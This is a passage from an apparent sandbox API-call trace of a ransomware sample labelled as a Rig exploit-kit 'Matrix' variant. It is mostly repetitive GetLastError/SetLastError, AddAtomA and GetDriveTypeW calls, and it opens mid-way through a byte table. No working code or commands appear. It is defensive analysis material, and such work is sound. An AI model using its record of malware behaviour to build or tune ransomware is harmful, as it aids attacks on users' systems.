\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\x5d\x82\x40\x27\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0085.848] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.850] SetLastError 
(dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError 
(dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError 
(dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.857] SetLastError 
(dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError 
(dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError 
(dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError 
(dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.863] SetLastError (dwErrCode=0x0) [0085.863] GetLastError () returned 0x0 [0085.863] SetLastError (dwErrCode=0x0) [0085.863] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0085.864] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError 
(dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.868] SetLastError 
(dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.870] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") 
returned 0x0 [0085.870] AddAtomA (lpString=0x0) returned 0x0 [0085.870] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA 
